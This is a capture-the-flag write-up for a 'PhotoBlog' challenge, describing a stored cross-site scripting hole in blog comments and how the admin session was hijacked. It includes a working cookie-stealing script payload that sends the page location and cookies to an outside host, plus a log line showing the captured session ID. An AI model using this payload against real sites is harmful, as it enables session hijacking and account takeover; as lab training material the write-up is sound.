Rating:
# PhotoBlog
## Task
A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea?
## Solution
The website to pown is a photoblog where you can add comments on a cat picture.
By posting comments such as `<script>alert(123)</script>` we notice that there is an XSS vulnerability.
The admin panel is located at the address `admin.php`. Although, when we we try to access it we are redirected to `login.php`.
The XSS vulnerability can be used to get the admin's cookie in order to connect to `admin.php`.
After we posted the following comment
```javascript
<script>
im=document.createElement('img');
im.src="http://rainbowlyte.com/pirate.png?loc="+document.location+"&cookie="+document.cookie;
document.body.appendChild(im);
</script>
```
we got the following request in our logs.
```
213.233.185.27 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc=http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 "http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
```
The admin's `PHPSESSID` is `515386866780b5f132fc96c02b3ddb82`.
Once we changed our cookie, we can access `admin.php` and get the flag.
